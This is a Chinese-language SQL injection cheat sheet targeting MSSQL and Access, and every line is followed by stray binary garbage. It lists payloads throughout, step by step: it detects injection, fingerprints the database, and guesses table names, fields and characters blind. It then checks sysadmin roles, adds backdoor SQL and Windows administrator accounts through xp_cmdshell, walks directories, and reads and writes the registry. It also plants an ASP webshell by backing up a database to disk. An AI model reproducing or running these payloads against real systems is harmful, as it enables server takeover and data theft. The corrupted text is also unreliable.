1.判断是否有注入;and 1=1 ;and 1=2 X3:XTuV���
2.初步判断是否是mssql ;and user>0 z�rv#Xa!O\
^6�P��3%�
3.注入参数是字符'and [查询条件] and ''='
|?,[@z _,
7�`H�
1f]d
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 6�^n0[�7�
k@D0 �{z��
5.判断数据库系统 I�3:[= ,5�
(?k�l$~�&|
;and (select count(*) from sysobjects)>0 mssql �<z�y,5IlD
}Jh: 8BNuP
;and (select count(*) from msysobjects)>0 access Xy5�s�^82?
#:|���+XLL
��9F-�
)r'
'snn~{�h�G
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Z!&R�r~i
<
�[;�.�`�,/
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �a7��/-�wk
�\WrF�qm�#
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 C"qU-&�*v�
�H�:�JLAK
9.(1)猜字段的ascii值(access) W�85@v�2b�
Dba�f0���
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �ow;R$�5�G
*P�!e:Tm)
(2)猜字段的ascii值(mssql) 3!o4)y�JWx
$�R�w�B_F�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 oi��&Wo'DX
&Q�=ZwC7�#
10.测试权限结构(mssql) ��omf�� Rs
]:�$
O�{y
L~/�qGDXC?
qxM��np}O�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- !�epg��T�N
HXVB�b%p�P
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- C�G&`16KN7
�Koln9'tB
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �tP�yy�Z#,
des�ThnT�w
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,kp\(X�[J
4^�'�3&v�u
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- m�&oi8 P-6
x/�MZ�(A%D
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ^D_/�=4rz8
*Sf�-;��U
;and 1=(select IS_MEMBER('db_owner'));-- �&>jAe_{",
QIn/�,Y�d�
"4j:�[9vR\
rba�;�&D;�
11.添加mssql和系统的帐户 v !Kw<
fp|
��1��fL<&G
;exec master.dbo.sp_addlogin username;-- tAFti+Qb��
;exec master.dbo.sp_password null,username,password;-- &�~f3��psA
FM5e+$>�@�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��ql&*6KZ"
i_LF`JhEQT
;exec master.dbo.xp_cmdshell 'net user username password kF ��V�7l�
��LDy<k=;o
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- @TA��9V@?)
0gF!�!m��
;exec master.dbo.xp_cmdshell 'net user username password /add';-- cM��&'[C�I
`wTl��yS3[
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- &�Rz,
�J]�
�2o�[IHO]�
V5�Gk�P1�L
z&�$/�EP-�
12.(1)遍历目录 �agO�k*wH5
i�!dv�0�|_
;create table dirs(paths varchar(100), id int) \H5J��k$�*
y466A]|���
;insert dirs exec master.dbo.xp_dirtree 'c:\' i(wgB�\9i4
o8FXqTUcs4
;and (select top 1 paths from dirs)>0 q ��cA`�)j
qt��urd�7
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �qq0?e�0H
Y�&r]lD��
�M_D�6i%b^
lZt(��&^�T
(2)遍历目录 �jB^�OP�1�
"�]�-]�,K�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 3��rf#Q�}"
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 M\�+*�P,i�
8xI`j�E"�1
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 e}cn�X��`B
Hwe)T�sh e
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �s3lwu :4f
?&�h�3�P�8
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 =z�iy`#fm,
��Oz:ZQ M
�yNJAW��M7
a~^Srj!}x�
13.mssql中的存储过程 � D\T!4q'Q
X`\���:_�|
xp_regenumvalues 注册表根键, 子键 8��]0:1
{@
q���GP��b�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 '�3�k�c�D7
�M�dhT�!�?
xp_regread 根键,子键,键值名 ��2Q$\�KRE
f�'dK73Xof
;exec xp_regread 7-9;PkGG.A
=!-5�+�I#e
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ��^�4`&E�F
_&
�4�it�s
xp_regwrite 根键,子键, 值名, 值类型, 值 �^ZQCIS-R
LE���c8NQs
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 8gmn6d�C�f
�eZO9�GMO�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 s5Fr)q// !
�Fy�EDt�@J
xp_regdeletevalue 根键,子键,值名 >�4�![&��&
�>�3 Ko.3&
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 |r~�
u�os�
�Q5�9��/ex
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��Bx�X$5�u
{u��30r�c"
c�%YDt`��
A:�Rw�@�B$
14.mssql的backup创建webshell !J�.rM5K��
�d0C8*ifFO
use model Y%v��P#>h
ix�Ow��=!@
create table cmd(str image); Wh���U��a^
������"j�U
insert into cmd(str) values (''); ��d7bjbJwu
=
?�N^>zie
backup database model to disk='c:\l.asp'; D$_8r�Hc\A
s%dF~D�SK�
�ehc<|O9tY
@&/\r
7�
'
15.mssql内置函数 iA�Q��vsE�
�] EyeBF)$
;and (select @@version)>0 获得Windows的版本号 (4)3W^/kk?
$ WFhBak8�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa eEC�j_e�H-
!5;t#�4��=
;and (select user_name())>0 爆当前系统的连接用户 C��/+nSe.�
PbUI!Xqe`�
;and (select db_name())>0 得到当前连接的数据库 #Da�P=k"XV
\�3 KfD'L�
2�v|qLf�e1
�rZ�86�6\0
16.简洁的webshell Kpu<r�KP`�
j-P^Zv};�u
use model �FYeEG��
[�u\CD��sX
create table cmd(str image); px&=((Z7>�
H*qD: �N��
insert into cmd(str) values (''); [oHOHp/�V
P�w��#�2<>
backup database model to disk='g:\wwwtest\l.asp';
